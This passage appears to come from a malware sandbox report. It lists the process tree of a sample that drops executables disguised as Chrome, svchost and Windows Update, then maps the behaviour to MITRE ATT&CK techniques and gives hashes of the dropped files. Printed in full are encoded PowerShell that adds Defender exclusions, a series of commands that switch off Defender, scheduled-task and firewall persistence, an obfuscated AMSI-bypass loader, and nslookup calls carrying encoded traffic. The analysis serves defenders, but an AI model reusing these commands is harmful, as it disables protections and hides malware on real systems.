"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:4472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
4⤵
PID:4132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
4⤵
PID:5052

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "servicesupdate" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe"
3⤵
PID:4336

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "servicesupdate" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe"
4⤵
- Creates scheduled task(s)
PID:1484

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe"
3⤵
PID:4028

C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe
C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe
4⤵
- Executes dropped EXE
PID:2592

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
5⤵
PID:3896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
6⤵
PID:4216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
6⤵
PID:4980

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
5⤵
- Executes dropped EXE
PID:5060

C:\Users\Admin\AppData\Local\Temp\CHROME.EXE
"C:\Users\Admin\AppData\Local\Temp\CHROME.EXE"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2728

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
4⤵
PID:908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
4⤵
PID:4496

C:\Windows\System32\nslookup.exe
C:\Windows\System32\nslookup.exe
3⤵
- Drops file in Windows directory
PID:3996

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
4⤵
- Creates scheduled task(s)
PID:4532

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
3⤵
PID:4452

C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:428

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
5⤵
PID:4544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
6⤵
PID:4588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
6⤵
PID:5100

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
5⤵
- Executes dropped EXE
PID:3900

C:\Windows\System32\nslookup.exe
"C:\Windows\System32\nslookup.exe" "saifcdmtmnvcn"
6⤵
PID:4716

C:\Windows\System32\nslookup.exe
C:\Windows\System32\nslookup.exe sftvajqyhq0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS5a+kDe4w1mLzYsRI/LuCd6FAArVGer+fGI7AGs5V/i1l3RkntgnURxXlB6//2VjxVCI+Y6C+CXIc06SY0rs6kBeXVFHc2CHK39Mfl0SjCv7idMDtIMYnUkXuL3CDdDxh8N8AmoKBatGiJsH0Rbb52aAJmb4vq3sWUtVan9b4riuhJfhV7s/ssXFVbyBZM7oqx/ZG1guFpT334AoH/LyKl2GU3UlJ+xWa5R9QGSALZ93yai32VNe3EiSxlcjwWccfm4+dDfYIe1/oNXvKQcvYm58w4oha65/CLmmwfV0MRLFUmx7aZywYBY41aLenObWAPiQmf9dzCvLpdIhSZMVhKh2WQMM3g7f6U+DzDbAIQ6KKyVRXQ9i4ep5kcxvRG7GVQSXXvE7U0aRZThxD21wjOx5m07be+XADWn0AVjktWo33v6RYjetPkeb6WXmTp08Oqlj3o88lt8OE0RVizcsjhdCFoi9TI+IockCfmpTYG1sHOnaPjLG0RiVNb+yqvAtXiy8zKnecp7CZuu4b/jiFW8sQelPXB9cVk01Kkb4I1daMatStvVzc0KSVG8mKggxec8XjPfyFNTdwC6YmaLprIY1qtgre6j93Lsp4RvRk08GiA7Z8m7c93+5XI8z6UdPqP50axZPkt4XplOgRZuDsdsULEm5QwCfDQ453GqGAbN1KbMIIsyvIkYTlNPgq06Pz1T5lVNMVXeFpapiDKKOdEjwiidghJqBkx9fGVUUJ5hROYSaHIe3H7XBQ2uA1aylhpGUQf8xpWLy+t1n9yA8YzzS9mX8HkCswg+95bJbWIXuHdgBsFKKgR+r/4nuEK11pTaplR1OK+cnNprdEfTuWu
5⤵
PID:2588

C:\Users\Admin\AppData\Local\Temp\GOOGLE CHROME.EXE
"C:\Users\Admin\AppData\Local\Temp\GOOGLE CHROME.EXE"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "GOOGLE CHROME.EXE"
3⤵
- Suspicious use of WriteProcessMemory
PID:4740

C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
4⤵
- Delays execution with timeout.exe
PID:4388

C:\Users\Admin\AppData\Local\Temp\NOTEPAD.EXE
"C:\Users\Admin\AppData\Local\Temp\NOTEPAD.EXE"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3836

C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe"
3⤵
- Executes dropped EXE
PID:2164

C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
"C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
2⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:4084

C:\Users\Admin\AppData\Local\Temp\WINDOWS UPDATE.EXE
"C:\Users\Admin\AppData\Local\Temp\WINDOWS UPDATE.EXE"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:500

C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3212

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
4⤵
PID:4120

C:\Users\Admin\AppData\Local\Temp\WINDOWS.EXE
"C:\Users\Admin\AppData\Local\Temp\WINDOWS.EXE"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
3⤵
PID:2988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:JaLleVdSQeRq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SaagmtiUmJVZEE,[Parameter(Position=1)][Type]$WceeBNockP)$bamThgtfGIT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$bamThgtfGIT.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$SaagmtiUmJVZEE).SetImplementationFlags('Runtime,Managed');$bamThgtfGIT.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$WceeBNockP,$SaagmtiUmJVZEE).SetImplementationFlags('Runtime,Managed');Write-Output $bamThgtfGIT.CreateType();}$GXsevDZCEpfeT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XNGJtTrnOjSOgo=$GXsevDZCEpfeT.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gsEdFclDwedQmQARqmX=JaLleVdSQeRq @([String])([IntPtr]);$UEhpQwSVVCVUwQhMwSMnIE=JaLleVdSQeRq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dyqVnOxSHNO=$GXsevDZCEpfeT.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$RkhRVLoWzeucly=$XNGJtTrnOjSOgo.Invoke($Null,@([Object]$dyqVnOxSHNO,[Object]('Load'+'LibraryA')));$tgOzcWVzNOZUtoaCp=$XNGJtTrnOjSOgo.Invoke($Null,@([Object]$dyqVnOxSHNO,[Object]('Vir'+'tual'+'Pro'+'tect')));$SprOBgT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RkhRVLoWzeucly,$gsEdFclDwedQmQARqmX).Invoke('a'+'m'+'si.dll');$ZfsyqogkeIdvtqRql=$XNGJtTrnOjSOgo.Invoke($Null,@([Object]$SprOBgT,[Object]('Ams'+'iSc'+'an'+'Buffer')));$EufvqcnPLv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tgOzcWVzNOZUtoaCp,$UEhpQwSVVCVUwQhMwSMnIE).Invoke($ZfsyqogkeIdvtqRql,[uint32]8,4,[ref]$EufvqcnPLv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$ZfsyqogkeIdvtqRql,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tgOzcWVzNOZUtoaCp,$UEhpQwSVVCVUwQhMwSMnIE).Invoke($ZfsyqogkeIdvtqRql,[uint32]8,0x20,[ref]$EufvqcnPLv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uSjCozvsHgXr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iKMWeOuPwttGJN,[Parameter(Position=1)][Type]$jqdNgjGRKH)$OxbnGfBKbuh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$OxbnGfBKbuh.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$iKMWeOuPwttGJN).SetImplementationFlags('Runtime,Managed');$OxbnGfBKbuh.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jqdNgjGRKH,$iKMWeOuPwttGJN).SetImplementationFlags('Runtime,Managed');Write-Output $OxbnGfBKbuh.CreateType();}$jAExqJdSKRcjj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$fYYhNWKTgTpsOo=$jAExqJdSKRcjj.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hewCTdcUuSMwXjiMobx=uSjCozvsHgXr @([String])([IntPtr]);$xrrQhvQZYIwXyCxUUfvyHN=uSjCozvsHgXr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZnTKhIbdpcF=$jAExqJdSKRcjj.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$wtrnKZXrPSsokJ=$fYYhNWKTgTpsOo.Invoke($Null,@([Object]$ZnTKhIbdpcF,[Object]('Load'+'LibraryA')));$QvfEYyQpLbrjOVPwP=$fYYhNWKTgTpsOo.Invoke($Null,@([Object]$ZnTKhIbdpcF,[Object]('Vir'+'tual'+'Pro'+'tect')));$aGrjSi
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3064

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
8b350aa9a6641ead19e3f019f62d50c4

SHA1
8c8710fa4f5a25022737620013065681a3e6f40f

SHA256
6c44cd827307a09dd95f8f08e4d1e8a168e9624ac6fb3566cd90535ce4ec5210

SHA512
ca69417a57764abf37639551bf2115466aa45dad0544b9a15b7224d081fb9b90b1a17785c6643c919060f77f4e7ff7c075549e7eadf6f830feef057bffebd16a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
60e2acd2f45a98119f98a19a08ce9cca

SHA1
d2cb3c352be636c3cb05b68303de9bb582aef8eb

SHA256
2c9bb5d16688463fde565205e40dc9e51639e7ce72b0fddd9fc8288b1c8a6f8e

SHA512
ec9de2fc7a5a83b73739fae1cef0e9f5fdf348825998d3258094da0351879bd9cb37f2086e5f217c40773adfd633e9cfe47dce64835d42f7d41f1e4341eb0d23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
4e2d048299aa7c9847d5d85b7016ccfc

SHA1
44cbbb0d89cd571a02babef7b4e4075c9424af6f

SHA256
68b5f046ca0998be41434e5780d36019c145543930d64d938a54780ad8e81315

SHA512
7ab1d634f20067a153f634f60f27cd1e3d18d6fc323a38e2ebcdc026c674e971a13c7b2a9385f66c2ed385d7d0086003acd4621e7af3503c7d3c4a14f7516a21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
673b32497c4b8170d4efb50eb37f6446

SHA1
66ea0b20b78996f160aa1e25ebd308c09a4c2c03

SHA256
29ed68d8539699b44b55bc8676981b2f602df9ed04f38feac9cb7f5fc83a4398

SHA512
7767bd47ded8cc9e049aa92454a88ea01ba43f8fab5e31f1bdba51e689c58f3150e781183907372f3a05d33f673cfeb22e27aeb33b6dbae1372bc27e6e114fde

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
841a6e79ad91d6cb4f70e58e0c90525c

SHA1
1f5e673f7e241423a8711f7fb06f65b77033f61b

SHA256
5b6dcc65160ae1d2896a16fe4ac86124074022d8098588ee5bb85b49c2aae92b

SHA512
99cd17e7303b7a32c483c8e1c74dc426795983ddfff13093f6b4c4a4d339269e396a3ba64f33e134b52d1e81fb82924a063502e36d478d13f8250fefd3e79dbf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
a35293fc8cb35e8496adc9199ef40ad8

SHA1
8fa692f4a91fbf19f78c8e454a5c01b7d7f0b9f4

SHA256
0422127b622170b2705a254827868ae555f65ff0f2b6126fdbc172e05bec08f3

SHA512
9d40b336f0384542b83deec92bab93e5cf9fa3e5c806905d91c62075bb4a919adf8b2a60746acc23c274b46a7857403463ad88163259440a406129d0cac34246

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
183e0ae49dfbd931ec07bfb68c022c1c

SHA1
1d6ecfb1e7e56af31bde2da6a0efa0143981adb6

SHA256
b7ec19da7c908233354fd2e50d4a9a0bcbd9711eb592331222f175b713b8a3ff

SHA512
e9e6fbd4d581f05ba58b97819b2295722fcf823afc2a3e53b72b285a594eb2e302b92950721e422950adafdddaa878f3e380f294fc90f2ab189234d7357fa5b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
201740cd6830f527b611631013ce996c

SHA1
46094b36539bd17b9f7c24c735f05a73f974144d

SHA256
bccfd10e4cbf34f64cf063c899d41fe32add3e44da2807d6b4b54adf839425ec

SHA512
ec0b2565c58ec647f1773d150813dcece3c56de3822622c0f9711b1755c5e8970551907639a198bc24599c3e827bbc586f0390022d3b19a5e4e5f89c8087b6b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
516bad2ed3103c2f3aad9667aa6c8638

SHA1
72425d180d2eff62ce90d5d864cc5b0054d49bc5

SHA256
dc31e1be424c73ff50bbad5e36347ac4e263b74118c2fa0d3bd975954e94e5ce

SHA512
2cefb94e536692d523f31fcc6b79cca5c533be138cbe272e883502e18bfd3dca474fe10893b7e7b3621296809014bed8e2ac191a2e6c425fb9d2622164c8d5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
516bad2ed3103c2f3aad9667aa6c8638

SHA1
72425d180d2eff62ce90d5d864cc5b0054d49bc5

SHA256
dc31e1be424c73ff50bbad5e36347ac4e263b74118c2fa0d3bd975954e94e5ce

SHA512
2cefb94e536692d523f31fcc6b79cca5c533be138cbe272e883502e18bfd3dca474fe10893b7e7b3621296809014bed8e2ac191a2e6c425fb9d2622164c8d5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
1aa872fb5dc47fd7db20badba8534388

SHA1
aa50c132f3a6ccada7fd85132f1182c778a7025b

SHA256
4fb40871c0664ab02048ce67fe22c8aa5ead5946a1e2c42bd3c6c4e6d27b8baa

SHA512
ec4f0b59ce44d2cac525bce4d6ad20f9765d37ff6301a9da14922a651ad22ec982ad3e3cbe084d2c438ae2502d0d972d7102925b780b9eedba8fce916abad33c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
96f47388161fd515474ea700b114edf2

SHA1
47da4ecfdd98717c1190acfbb141a836da906869

SHA256
8df169d558e5317727410898e44a372cb4484e63cfb7e298e24ff51fe6a21887

SHA512
